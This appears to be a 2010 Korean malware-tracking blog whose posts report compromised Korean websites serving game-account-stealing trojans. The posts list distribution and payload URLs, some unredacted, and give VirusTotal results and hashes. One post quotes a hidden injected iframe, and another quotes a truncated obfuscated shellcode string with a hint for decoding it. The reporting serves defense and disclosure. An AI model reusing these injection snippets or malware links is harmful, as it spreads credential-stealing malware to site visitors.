posted by Kwan's 2010. 7. 15. 13:33


현재 이사이트에는 악성코드가 심어져있다. 평일에 오랜만에 만나는 악성코드사이트 인거 같다. 평일에는 관리를 않해서 그런가. 근데 이번에 심어져있는 샘플을 보면 몇일전 세티즌에 유포했던 샘플과 거의 비슷하다. 띄엄띄엄 코드를 해놓고는 ... 샘플 수집하는데 귀찮은줄 알았다 !

kr.exe 받는 파일은 5개있다

http://www.cnstaseed.org/templates/wXXntrue/root/AHHS3.js
http://www.cnstaseed.org/templates/wXXntrue/root/ah1.js
http://www.cnstaseed.org/templates/wXXntrue/root/n93.jpg
http://www.cnstaseed.org/templates/wXXntrue/root/ie.js
http://www.cnstaseed.org/templates/wXXntrue/root/ff.js

지인에 따르면 최종파일은 넥슨에 DNF ( 던젼 앤 파이터) 를 노린것으로 보인다 했다.
역시 게임계정해킹이 대세인거 같다..

현재 샘플은 : 안철수 연구소 , 이스트 소프트에 전송되었다!

검사 파일: kr.exe 전송 시각: 2010.07.15 03:45:42 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.15 -
AhnLab-V3 2010.07.15.00 2010.07.14 ASD.Prevention
AntiVir 8.2.4.10 2010.07.14 TR/Crypt.XPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.14 -
Authentium 5.2.0.5 2010.07.15 W32/RLPacked.A.gen!Eldorado
Avast 4.8.1351.0 2010.07.14 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.15 Win32:Malware-gen
AVG 9.0.0.836 2010.07.15 -
BitDefender 7.2 2010.07.15 Gen:Trojan.Generic.di1@aWgIOVdb
CAT-QuickHeal 11.00 2010.07.15 -
ClamAV 0.96.0.3-git 2010.07.15 -
Comodo 5432 2010.07.15 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.07.15 Trojan.MulDrop.60230
eSafe 7.0.17.0 2010.07.14 -
eTrust-Vet 36.1.7708 2010.07.15 -
F-Prot 4.6.1.107 2010.07.15 W32/RLPacked.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.07.15 Gen:Trojan.Generic.di1@aWgIOVdb
Fortinet 4.1.143.0 2010.07.14 -
GData 21 2010.07.15 Win32:Malware-gen
Ikarus T3.1.1.84.0 2010.07.15 Gen:Trojan
Jiangmin 13.0.900 2010.07.14 -
Kaspersky 7.0.0.125 2010.07.15 Trojan.Win32.Vilsel.ajgw
McAfee 5.400.0.1158 2010.07.15 PWS-Mmorpg!pr
McAfee-GW-Edition 2010.1 2010.07.14 Artemis!3B10E861FAC8
Microsoft 1.5902 2010.07.15 PWS:Win32/OnLineGames.HG!dll
NOD32 5279 2010.07.15 -
Norman 6.05.11 2010.07.14 Dialer.dam
nProtect 2010-07-14.01 2010.07.14 Gen:Trojan.Generic.di1@aWgIOVdb
Panda 10.0.2.7 2010.07.14 Trj/CI.A
PCTools 7.0.3.5 2010.07.15 Trojan.Dropper
Rising 22.56.03.01 2010.07.15 Packer.Win32.VmpPacker.a
Sophos 4.55.0 2010.07.15 Mal/EncPk-NQ
Sunbelt 6585 2010.07.15 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.07.15 -
Symantec 20101.1.1.7 2010.07.15 Trojan.Dropper
TheHacker 6.5.2.1.315 2010.07.15 -
TrendMicro 9.120.0.1004 2010.07.15 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.15 -
VBA32 3.12.12.6 2010.07.14 BScope.Dropper.Resgen
ViRobot 2010.7.12.3932 2010.07.14 -
VirusBuster 5.0.27.0 2010.07.14 Packed/RLPack
 
추가 정보
File size: 49944 bytes
MD5   : 3b10e861fac889322d56a6aaad8a45b0
SHA1  : d2a4102e9f210c4f8c2f825b0dd5a00317187a89
SHA256: 148ae041d940ef84b026eda6639890b5ed1ebe458c8dfb7798353ae666d71e1a

댓글을 달아 주세요

  1. hoo 2010.07.15 15:07  Addr  Edit/Del  Reply

    아무래도.. 돈이 되니까,, 계속나오네요..
    앗.. 아직도 유포가 되고 있네요..
    따끈따끈한 정보 감사합니다~

    • Kwan's 2010.07.15 15:19 신고  Addr  Edit/Del

      제글을 읽어주셔서 감사합니다 !!ㅎ 별로 대단한글도아닌데~ 항상 댓글 남겨주셔서 감사합니다! ㅎ

posted by Kwan's 2010. 7. 10. 17:09
현재 보안xx 에는 악성코드 js가 삽입 되어있다 !!


사이트에서 뉴스를 보던중 이상한 링크를 발견 하였다. 처음에는 설마 하였지만 파일을 살펴보니 이상한 사이트로 연결되는것을 보았다.
이 파일은 온라인 게임핵으로 보이며 계정탈취를 위해 쓰이는 것으로 판단이 되어진다.
이 파일은 현재 내가 글쓰고 있는 이시간에도 소스안에 박혀있으며 뉴스 페이지인만큼 많은 피해가 우려가 된다. 역시 주말에는 악성코드의 놀이터인거 같다 !!

원본 페이지 : http://www.boxx.com/news/articleView.html?idxno=2507
유포 페이지 : http://58xxx.com/js.js
~> http://58xxx.com/ad.htm
~> http://58xxx.com/top.jpg
     ~> 최종파일 다운 : http://58xxx.com/tt.exe
~> http://58xxx.com/cook.jpg
~> http://58xxx.com/cook1.jpg
~> http://58xxx.com/root.jpg

[ 바이러스 토탈 ]

검사 파일: ad.htm 전송 시각: 2010.07.10 07:51:34 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.10 -
AhnLab-V3 2010.07.10.00 2010.07.09 -
AntiVir 8.2.4.10 2010.07.09 -
Antiy-AVL 2.0.3.7 2010.07.09 -
Authentium 5.2.0.5 2010.07.10 -
Avast 4.8.1351.0 2010.07.10 -
Avast5 5.0.332.0 2010.07.10 -
AVG 9.0.0.836 2010.07.09 -
BitDefender 7.2 2010.07.10 -
CAT-QuickHeal 11.00 2010.07.10 -
ClamAV 0.96.0.3-git 2010.07.10 -
Comodo 5377 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.10 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7696 2010.07.10 -
F-Prot 4.6.1.107 2010.07.09 -
F-Secure 9.0.15370.0 2010.07.09 -
Fortinet 4.1.143.0 2010.07.09 -
GData 21 2010.07.10 -
Ikarus T3.1.1.84.0 2010.07.10 -
Jiangmin 13.0.900 2010.07.10 -
Kaspersky 7.0.0.125 2010.07.10 Exploit.JS.CVE-2010-0806.l
McAfee 5.400.0.1158 2010.07.10 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.5902 2010.07.10 -
NOD32 5266 2010.07.09 -
Norman 6.05.11 2010.07.09 -
nProtect 2010-07-09.01 2010.07.09 -
Panda 10.0.2.7 2010.07.09 -
PCTools 7.0.3.5 2010.07.10 -
Prevx 3.0 2010.07.10 -
Rising 22.55.04.04 2010.07.09 -
Sophos 4.55.0 2010.07.10 Mal/Badsrc-D
Sunbelt 6566 2010.07.10 -
Symantec 20101.1.0.89 2010.07.10 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.10 -
VBA32 3.12.12.6 2010.07.09 -
ViRobot 2010.6.29.3912 2010.07.10 -
VirusBuster 5.0.27.0 2010.07.09 -
 
추가 정보
File size: 1589 bytes
MD5...: cece023c94c964e87e18bada35cba08a
SHA1..: a4f3afe5bc01322147bfde786ebbdfcef23acda1
SHA256: 6f4fc46e4dfd66395a4409854deca6226171a11cb6aae462339cab8574dcad75
검사 파일: cook.jpg 전송 시각: 2010.07.10 07:51:37 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.10 -
AhnLab-V3 2010.07.10.00 2010.07.09 -
AntiVir 8.2.4.10 2010.07.09 -
Antiy-AVL 2.0.3.7 2010.07.09 -
Authentium 5.2.0.5 2010.07.10 -
Avast 4.8.1351.0 2010.07.10 -
Avast5 5.0.332.0 2010.07.10 -
AVG 9.0.0.836 2010.07.09 -
BitDefender 7.2 2010.07.10 -
CAT-QuickHeal 11.00 2010.07.10 -
ClamAV 0.96.0.3-git 2010.07.10 -
Comodo 5377 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.10 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7696 2010.07.10 -
F-Prot 4.6.1.107 2010.07.09 -
F-Secure 9.0.15370.0 2010.07.09 -
Fortinet 4.1.143.0 2010.07.09 -
GData 21 2010.07.10 -
Ikarus T3.1.1.84.0 2010.07.10 -
Jiangmin 13.0.900 2010.07.10 -
Kaspersky 7.0.0.125 2010.07.10 -
McAfee 5.400.0.1158 2010.07.10 -
McAfee-GW-Edition 2010.1 2010.07.05 -
Microsoft 1.5902 2010.07.10 -
NOD32 5266 2010.07.09 -
Norman 6.05.11 2010.07.09 -
nProtect 2010-07-09.01 2010.07.09 -
Panda 10.0.2.7 2010.07.09 -
PCTools 7.0.3.5 2010.07.10 -
Prevx 3.0 2010.07.10 -
Rising 22.55.04.04 2010.07.09 -
Sophos 4.55.0 2010.07.10 -
Sunbelt 6566 2010.07.10 -
Symantec 20101.1.0.89 2010.07.10 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.10 -
VBA32 3.12.12.6 2010.07.09 -
ViRobot 2010.6.29.3912 2010.07.10 -
VirusBuster 5.0.27.0 2010.07.09 -
 
추가 정보
File size: 428 bytes
MD5...: f87904eaef8ae79f2a68919fa183e9a3
SHA1..: a4609a8faa5606d50ce07ad97053e6e9763d6ae8
SHA256: 4f6408d2b48a2ba706c6cbe16c8c849c3d296d199f9eaf3a851cf819912b13f0
검사 파일: cook1.jpg 전송 시각: 2010.07.10 07:54:30 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.10 -
AhnLab-V3 2010.07.10.00 2010.07.09 -
AntiVir 8.2.4.10 2010.07.09 -
Antiy-AVL 2.0.3.7 2010.07.09 -
Authentium 5.2.0.5 2010.07.10 -
Avast 4.8.1351.0 2010.07.10 -
Avast5 5.0.332.0 2010.07.10 -
AVG 9.0.0.836 2010.07.09 -
BitDefender 7.2 2010.07.10 -
CAT-QuickHeal 11.00 2010.07.10 -
ClamAV 0.96.0.3-git 2010.07.10 -
Comodo 5377 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.10 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7696 2010.07.10 -
F-Prot 4.6.1.107 2010.07.09 -
F-Secure 9.0.15370.0 2010.07.09 -
Fortinet 4.1.143.0 2010.07.09 -
GData 21 2010.07.10 -
Ikarus T3.1.1.84.0 2010.07.10 -
Jiangmin 13.0.900 2010.07.10 -
Kaspersky 7.0.0.125 2010.07.10 -
McAfee 5.400.0.1158 2010.07.10 -
McAfee-GW-Edition 2010.1 2010.07.05 -
Microsoft 1.5902 2010.07.10 -
NOD32 5266 2010.07.09 -
Norman 6.05.11 2010.07.09 -
nProtect 2010-07-09.01 2010.07.09 -
Panda 10.0.2.7 2010.07.09 -
PCTools 7.0.3.5 2010.07.10 -
Prevx 3.0 2010.07.10 -
Rising 22.55.04.04 2010.07.09 -
Sophos 4.55.0 2010.07.10 -
Sunbelt 6566 2010.07.10 -
Symantec 20101.1.0.89 2010.07.10 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.10 -
VBA32 3.12.12.6 2010.07.09 -
ViRobot 2010.6.29.3912 2010.07.10 -
VirusBuster 5.0.27.0 2010.07.09 -
 
추가 정보
File size: 3349 bytes
MD5...: 59a3b5c3541ff9b411b14f90a7523d86
SHA1..: 9acda0680ca1e5e4493c85484a3734d395f74691
SHA256: 13ce3060a82619b76c430af3251d2b138eea57e84737da8f824cc365526625b3
검사 파일: root.jpg 전송 시각: 2010.07.10 07:54:34 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.10 -
AhnLab-V3 2010.07.10.00 2010.07.09 -
AntiVir 8.2.4.10 2010.07.09 -
Antiy-AVL 2.0.3.7 2010.07.09 -
Authentium 5.2.0.5 2010.07.10 -
Avast 4.8.1351.0 2010.07.10 -
Avast5 5.0.332.0 2010.07.10 -
AVG 9.0.0.836 2010.07.09 -
BitDefender 7.2 2010.07.10 -
CAT-QuickHeal 11.00 2010.07.10 -
ClamAV 0.96.0.3-git 2010.07.10 -
Comodo 5377 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.10 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7696 2010.07.10 -
F-Prot 4.6.1.107 2010.07.09 -
F-Secure 9.0.15370.0 2010.07.09 -
Fortinet 4.1.143.0 2010.07.09 -
GData 21 2010.07.10 -
Ikarus T3.1.1.84.0 2010.07.10 -
Jiangmin 13.0.900 2010.07.10 -
Kaspersky 7.0.0.125 2010.07.10 -
McAfee 5.400.0.1158 2010.07.10 -
McAfee-GW-Edition 2010.1 2010.07.05 -
Microsoft 1.5902 2010.07.10 -
NOD32 5266 2010.07.09 -
Norman 6.05.11 2010.07.09 -
nProtect 2010-07-09.01 2010.07.09 -
Panda 10.0.2.7 2010.07.09 -
PCTools 7.0.3.5 2010.07.10 -
Prevx 3.0 2010.07.10 -
Rising 22.55.04.04 2010.07.09 -
Sophos 4.55.0 2010.07.10 -
Sunbelt 6566 2010.07.10 -
Symantec 20101.1.0.89 2010.07.10 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.10 -
VBA32 3.12.12.6 2010.07.09 -
ViRobot 2010.6.29.3912 2010.07.10 -
VirusBuster 5.0.27.0 2010.07.09 -
 
추가 정보
File size: 163 bytes
MD5...: ab0effeb99cdb1a02da2e2897b4f6b23
SHA1..: 08d44f54df18da4e761b5379371833168aa4feb7
SHA256: 25e775d8df15348f9ddb19ef609dc890f1e88ed12f04731cd4d8120371d66128
검사 파일: top.jpg 전송 시각: 2010.07.10 07:59:28 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.10 -
AhnLab-V3 2010.07.10.00 2010.07.09 -
AntiVir 8.2.4.10 2010.07.09 -
Antiy-AVL 2.0.3.7 2010.07.09 -
Authentium 5.2.0.5 2010.07.10 -
Avast 4.8.1351.0 2010.07.10 -
Avast5 5.0.332.0 2010.07.10 -
AVG 9.0.0.836 2010.07.09 -
BitDefender 7.2 2010.07.10 -
CAT-QuickHeal 11.00 2010.07.10 -
ClamAV 0.96.0.3-git 2010.07.10 -
Comodo 5377 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.10 -
eTrust-Vet 36.1.7696 2010.07.10 -
F-Prot 4.6.1.107 2010.07.09 -
F-Secure 9.0.15370.0 2010.07.09 -
Fortinet 4.1.143.0 2010.07.09 -
GData 21 2010.07.10 -
Ikarus T3.1.1.84.0 2010.07.10 -
Jiangmin 13.0.900 2010.07.10 -
Kaspersky 7.0.0.125 2010.07.10 -
McAfee 5.400.0.1158 2010.07.10 -
McAfee-GW-Edition 2010.1 2010.07.05 -
Microsoft 1.5902 2010.07.10 -
NOD32 5266 2010.07.09 -
Norman 6.05.11 2010.07.09 -
nProtect 2010-07-09.01 2010.07.09 -
Panda 10.0.2.7 2010.07.09 -
PCTools 7.0.3.5 2010.07.10 -
Prevx 3.0 2010.07.10 -
Rising 22.55.04.04 2010.07.09 -
Sophos 4.55.0 2010.07.10 -
Sunbelt 6566 2010.07.10 -
Symantec 20101.1.0.89 2010.07.10 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.10 -
VBA32 3.12.12.6 2010.07.09 -
ViRobot 2010.6.29.3912 2010.07.10 -
VirusBuster 5.0.27.0 2010.07.09 -
 
추가 정보
File size: 572 bytes
MD5...: 72da5e66fcb8147da672fff8c689432f
SHA1..: a55d72c19013fef27e84617cb7ff6bf171f78b3c
SHA256: a8e7a5591fc7214c80975a9cfd174891e7b96611d4da26fde330301417528fc8
검사 파일: tt.exe 전송 시각: 2010.07.10 08:03:23 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.10 -
AhnLab-V3 2010.07.10.00 2010.07.09 Dropper/Win32.OnlineGameHack
AntiVir 8.2.4.10 2010.07.09 TR/Downloader.Gen
Antiy-AVL 2.0.3.7 2010.07.09 -
Authentium 5.2.0.5 2010.07.10 -
Avast 4.8.1351.0 2010.07.10 -
Avast5 5.0.332.0 2010.07.10 -
AVG 9.0.0.836 2010.07.09 Generic18.AANL
BitDefender 7.2 2010.07.10 -
CAT-QuickHeal 11.00 2010.07.10 -
ClamAV 0.96.0.3-git 2010.07.10 -
Comodo 5377 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.10 -
eTrust-Vet 36.1.7696 2010.07.10 -
F-Prot 4.6.1.107 2010.07.09 -
F-Secure 9.0.15370.0 2010.07.09 -
Fortinet 4.1.143.0 2010.07.09 -
GData 21 2010.07.10 -
Ikarus T3.1.1.84.0 2010.07.10 -
Jiangmin 13.0.900 2010.07.10 Trojan/Vilsel.jmu
Kaspersky 7.0.0.125 2010.07.10 -
McAfee 5.400.0.1158 2010.07.10 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.Win32.Dropper.H
Microsoft 1.5902 2010.07.10 -
NOD32 5266 2010.07.09 -
Norman 6.05.11 2010.07.09 -
nProtect 2010-07-09.01 2010.07.09 -
Panda 10.0.2.7 2010.07.09 -
PCTools 7.0.3.5 2010.07.10 -
Prevx 3.0 2010.07.10 -
Rising 22.55.04.04 2010.07.09 -
Sophos 4.55.0 2010.07.10 Mal/GamePSW-I
Sunbelt 6566 2010.07.10 -
Symantec 20101.1.0.89 2010.07.10 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.10 -
VBA32 3.12.12.6 2010.07.09 -
ViRobot 2010.6.29.3912 2010.07.10 -
VirusBuster 5.0.27.0 2010.07.09 -
 
추가 정보
File size: 81920 bytes
MD5...: fd12bb1800d6fb4aac838e47ec9dac25
SHA1..: ee7011a6f85907591425d96751c4ace6943dae69
SHA256: d1c6030f80ad761f316b999eac1b6eff801124f37b2ba352daf97bb752e051f9

[ 이전글 ]

[security/악성코드 유포] - 휴대폰 통신사 큐x텔 악성 스크립트 삽입 !!
[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK

댓글을 달아 주세요

posted by Kwan's 2010. 7. 9. 14:34
지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,.
사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !!
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

몇주동안 잠잠 하더니 자시 한번 악성코드에 감염된거 같다. 2주만에 다시 그러니 관리자가 뭐하고 있는지. 그래도 스크립트는 오래된것이 아니라 그런지 대부분의 업체에서 전부 진단을 함으로 신고 할 필요가 없을듯 싶다. 최종파일 위치까지 예전이랑 똑같아서 이제는 그럴려니 하고 넘어간다. 그래도 통신사인데 휴대폰 업데이트나 , 정보를 찾아가는 사람들이 백신이 없다면 감염되기 쉽상일꺼 같다. 빨리 관리자 분이 보셔서 삭제하길 희망한다. !!

감염 사이트 : http://www.cuxxtel.com
악성유포지 :  http://110.xx.139.2x1/css/Lib.asp
최종파일 : http://61.1xx.x.93/css/isa.exe

[바이러스 토탈 결과]

검사 파일: lib.asp 전송 시각: 2010.07.09 05:04:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.07.09.00 2010.07.08 JS/Downloader
AntiVir 8.2.4.10 2010.07.08 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 JS:Downloader-QJ
Avast5 5.0.332.0 2010.07.08 JS:Downloader-QJ
AVG 9.0.0.836 2010.07.08 Script/Exploit
BitDefender 7.2 2010.07.09 Trojan.Script.407264
CAT-QuickHeal 11.00 2010.07.09 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.07.09 Trojan.Script.407264
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.07.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.07.08 -
Kaspersky 7.0.0.125 2010.07.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.07.09 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5902 2010.07.08 -
NOD32 5263 2010.07.08 probably a variant of JS/TrojanDownloader.Agent
Norman 6.05.11 2010.07.08 -
nProtect 2010-07-08.01 2010.07.08 Script-JS/W32.Agent.WH
Panda 10.0.2.7 2010.07.08 -
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 -
Rising 22.55.04.01 2010.07.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.54.0 2010.07.09 JS/Agent-MZX
Sunbelt 6562 2010.07.09 -
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 -
ViRobot 2010.6.29.3912 2010.07.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.07.09 05:04:22 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Trojan.Peed!IK
AhnLab-V3 2010.07.09.00 2010.07.08 Win-Trojan/Onlinegamehack.55296.G
AntiVir 8.2.4.10 2010.07.08 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.08 Win32:Malware-gen
AVG 9.0.0.836 2010.07.08 PSW.Generic8.DOZ
BitDefender 7.2 2010.07.09 Trojan.Generic.KD.18284
CAT-QuickHeal 11.00 2010.07.09 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 Trojan.Agent-164869
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 Win32.TRCrypt.ZPACK
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 -
F-Secure 9.0.15370.0 2010.07.09 Trojan.Generic.KD.18284
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Generic.KD.18284
Ikarus T3.1.1.84.0 2010.07.09 Trojan.Peed
Jiangmin 13.0.900 2010.07.08 Trojan/PSW.Magania.anlt
Kaspersky 7.0.0.125 2010.07.09 -
McAfee 5.400.0.1158 2010.07.09 PWS-Mmorpg!pq
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.LooksLike.Trojan.Crypt.ZPACK.B
Microsoft 1.5902 2010.07.08 PWS:Win32/Magania.gen
NOD32 5263 2010.07.08 -
Norman 6.05.11 2010.07.08 W32/Suspicious_Gen2.BHOYR
nProtect 2010-07-08.01 2010.07.08 Trojan/W32.Agent.55296.IL
Panda 10.0.2.7 2010.07.08 Trj/CI.A
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 High Risk Cloaked Malware
Rising 22.55.04.01 2010.07.09 Trojan.Win32.Generic.521B263B
Sophos 4.54.0 2010.07.09 Sus/UnkPack-C
Sunbelt 6562 2010.07.09 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.6.29.3912 2010.07.09 Trojan.Win32.PSWMagania.55296.K
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea


[이전글]

[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

댓글을 달아 주세요

  1. hoo 2010.07.09 16:41  Addr  Edit/Del  Reply

    줄기차게 나오네요..
    잘보고 갑니다~

    • Kwan's 2010.07.10 17:30 신고  Addr  Edit/Del

      Lib.asp 는 항상 똑같은곳에서 유포하는데 아직까지도 삭제되지않는거 보니 관리자가 손을 놓고 있나봐요~

posted by Kwan's 2010. 7. 8. 13:39
요즘 중국 사이트에서 악성코드가 삽입되는 사이트를 하루에 하나씩 보는거 같다. 오늘도 메일을 받던중 악성코드 사이트로 연결되는 사이트를 발견하였다. 이번에도 코드 자체가 평소와 같아서 사이트에서 최종파일 칮기란 매우 쉬웠다. 최종파일의 역활은 아직까지 하는것은 모르겠지만 안랩에서는 ASD로 때려 잡았다 !

코드의 앞부분과 뒷부분은 어제와 마찬가지로 '+' 만 빼고 한다면 쉽게 최종파일까지 근접할수 있을것이다.

%u5858%u5858%u10EB%u4B5B%uC'+'933%uB96'+'6%u03B8%u34'+'80%uBD0B%uFA'+'E2%u05E'+'B%uEBE8 (중략) %uc9c9%u87cd%u9292%ucece%u93ce%ud8ce%u84ce%uce84%ude93%u87d3%u8585%uc592%u9388%uc5d8%ubdd8%ubdbd%uEAEA%uEAEA%uEAEA%uEAEA 이런식으로 나와 있다.

이걸 해석 하여야만 최종 파일인 http://sXs.sXs99X.cn:88/x5.exe 파일을 다운 받을수 있다 !!

[바이러스 토탈]

검사 파일: xi05.htm 전송 시각: 2010.07.08 04:34:52 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.08 Exploit.JS.ShellCode!IK
AhnLab-V3 2010.07.08.00 2010.07.07 -
AntiVir 8.2.4.10 2010.07.07 HTML/Shellcode.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.08 JS/Cosmu.A
Avast 4.8.1351.0 2010.07.07 JS:CVE-2010-0806-AK
Avast5 5.0.332.0 2010.07.07 JS:CVE-2010-0806-AK
AVG 9.0.0.836 2010.07.08 Exploit.Aurora
BitDefender 7.2 2010.07.08 -
CAT-QuickHeal 11.00 2010.07.08 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5354 2010.07.08 -
DrWeb 5.0.2.03300 2010.07.08 -
eSafe 7.0.17.0 2010.07.07 JS.ShellCode.Aurora
eTrust-Vet 36.1.7691 2010.07.07 JS/CVE-2008-0015!exploit
F-Prot 4.6.1.107 2010.07.07 JS/Cosmu.A
F-Secure 9.0.15370.0 2010.07.08 -
Fortinet 4.1.133.0 2010.07.07 -
GData 21 2010.07.08 JS:CVE-2010-0806-AK
Ikarus T3.1.1.84.0 2010.07.08 Exploit.JS.ShellCode
Jiangmin 13.0.900 2010.07.07 -
Kaspersky 7.0.0.125 2010.07.08 Exploit.JS.Agent.bab
McAfee 5.400.0.1158 2010.07.08 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Suspicious.A
Microsoft 1.5902 2010.07.08 Exploit:JS/ShellCode.Z
NOD32 5260 2010.07.07 JS/Exploit.CVE-2010-0806.A
Norman 6.05.11 2010.07.07 HTML/Agent.BG
nProtect 2010-07-07.02 2010.07.07 -
Panda 10.0.2.7 2010.07.07 -
PCTools 7.0.3.5 2010.07.07 Downloader.Generic
Prevx 3.0 2010.07.08 -
Rising 22.55.02.04 2010.07.07 Hack.Exploit.Script.JS.Agent.ju
Sophos 4.54.0 2010.07.08 -
Sunbelt 6557 2010.07.07 -
Symantec 20101.1.0.89 2010.07.08 Downloader
TheHacker 6.5.2.1.309 2010.07.07 -
TrendMicro 9.120.0.1004 2010.07.08 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.08 Expl_ShellCodeSM
VBA32 3.12.12.6 2010.07.07 -
ViRobot 2010.6.29.3912 2010.07.08 -
VirusBuster 5.0.27.0 2010.07.07 -
 
추가 정보
File size: 4134 bytes
